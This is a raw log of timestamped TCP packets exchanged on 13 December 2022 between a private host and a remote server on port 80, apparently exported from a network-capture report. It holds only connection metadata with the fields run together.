                                              Dec 13, 2022 20:09:15.105385065 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.105607033 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.105808973 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.105931997 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.110770941 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.110986948 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.111140013 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.111278057 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.111409903 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.111557961 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.111718893 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.111884117 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.112020969 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.112241983 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.112345934 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.112493992 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.112646103 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.112809896 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.112961054 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.113117933 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.113289118 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.113436937 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.113600016 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.113759041 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.113908052 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.114068985 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.114233017 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.114357948 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.114502907 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.114662886 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.114825010 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.114960909 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.115077972 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.115232944 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.115395069 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.115550995 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.115709066 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.115855932 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.116009951 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.116127014 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.116245031 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.117115021 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.117285967 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.117434025 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.117556095 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.117697001 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.117830038 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.117964029 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.118112087 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.118225098 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.118369102 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.118515015 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.118649006 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.118767023 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.118896961 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.119024992 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.119178057 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.127451897 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.127691984 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.127821922 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.127971888 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.128180027 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.128350019 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.128485918 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.128614902 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.128745079 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.128871918 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.129004002 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.129132032 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.129262924 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.129390001 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.129506111 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.129626036 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.129745960 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.129870892 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.129995108 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.130119085 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.130250931 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.130382061 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.130508900 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.130661011 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.130806923 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.130963087 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.131093979 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.131232977 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.131392956 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.131561995 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.131715059 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.131872892 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.132128000 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.132271051 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.132415056 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.132554054 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.132714987 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.132855892 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.133012056 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.133172989 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.133343935 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.133472919 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.133627892 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.133786917 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.133924007 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.134059906 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.134200096 CET804973862.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.134210110 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.134356022 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.134412050 CET4973880192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.134536028 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.134680986 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.134825945 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.134969950 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.135114908 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.135993958 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.136013985 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.136140108 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.136773109 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.136789083 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.136821985 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.136986017 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.137131929 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.137322903 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.137615919 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.137744904 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.137907028 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.138199091 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.138295889 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.138351917 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.138542891 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.138631105 CET804973962.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.138644934 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.138770103 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.138772964 CET4973980192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.139013052 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.139240980 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.139482975 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.139539957 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.140223026 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.140620947 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.140944958 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.140959978 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.141201019 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.141519070 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.141649961 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.141788960 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.141836882 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.141973972 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.142031908 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.142093897 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.142260075 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.142286062 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.142505884 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.153112888 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.153403044 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.153498888 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.153552055 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.153712034 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.155191898 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.155426979 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.155483961 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.155508995 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.155543089 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.155637980 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.155652046 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.155664921 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.155678988 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.155693054 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.155705929 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.155719042 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.155733109 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.155746937 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.155760050 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.155838966 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.155945063 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.156121016 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.156601906 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.156618118 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.156706095 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.156903028 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.157047033 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.157093048 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.157237053 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.157337904 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.157777071 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.157790899 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.157830954 CET4973980192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.157963991 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.158020973 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.158154011 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.158229113 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.158288002 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.158411980 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.158442974 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.158510923 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.158601046 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.158752918 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.158895969 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.158921003 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.158966064 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.159056902 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.159178019 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.159215927 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.159468889 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.159524918 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.159657955 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.164861917 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.164884090 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.165080070 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.165155888 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.165353060 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.165476084 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.165641069 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.165837049 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.166039944 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.166235924 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.166358948 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.170839071 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.171050072 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.171230078 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.171324968 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.171399117 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.171519041 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.171663046 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.171725035 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.171756029 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.171802998 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.171818018 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.171864986 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.172044992 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.172084093 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.172121048 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.172187090 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.172322989 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.172336102 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.172491074 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.172558069 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.172641993 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.172684908 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.172779083 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.172802925 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.172916889 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.172931910 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.173077106 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.173082113 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.173227072 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.173357964 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.173398972 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.173482895 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.173501015 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.173516035 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.173683882 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.173723936 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.173907995 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.174024105 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.174160957 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.174184084 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.174194098 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.174326897 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.174343109 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.174530983 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.174566984 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.174686909 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.174726963 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.174843073 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.174971104 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.175014019 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.175120115 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.175257921 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.175323009 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.175368071 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.175384045 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.175399065 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.175414085 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.175476074 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.175590992 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.175677061 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.175739050 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.175806046 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.175884008 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.175961018 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.176034927 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.176161051 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.176187992 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.176338911 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.176424026 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.176471949 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.176496029 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.176644087 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.177674055 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.178692102 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.178708076 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.178721905 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.178735971 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.178749084 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.178761959 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.178775072 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.178786993 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.178801060 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.178814888 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.178839922 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.178919077 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.179088116 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.179182053 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.179359913 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.179475069 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.179635048 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.188092947 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.188261032 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.188371897 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.188429117 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.188674927 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.188853025 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.188998938 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.189070940 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.189376116 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.189405918 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.189532042 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.189718962 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.189733028 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.189882994 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.189960003 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.190064907 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.190253973 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.190351009 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.190603971 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.190619946 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.190773964 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.190911055 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.190996885 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.191148996 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.191303015 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.191411018 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.191692114 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.191719055 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.191876888 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.192069054 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.192136049 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.192348957 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.192589045 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.192718983 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.192847013 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.193208933 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.193228006 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.193298101 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.193679094 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.193715096 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.193826914 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.193977118 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.194065094 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.194361925 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.194381952 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.194598913 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.194673061 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.194834948 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.195063114 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.195122004 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.195265055 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.195440054 CET804973662.204.41.79192.168.2.3
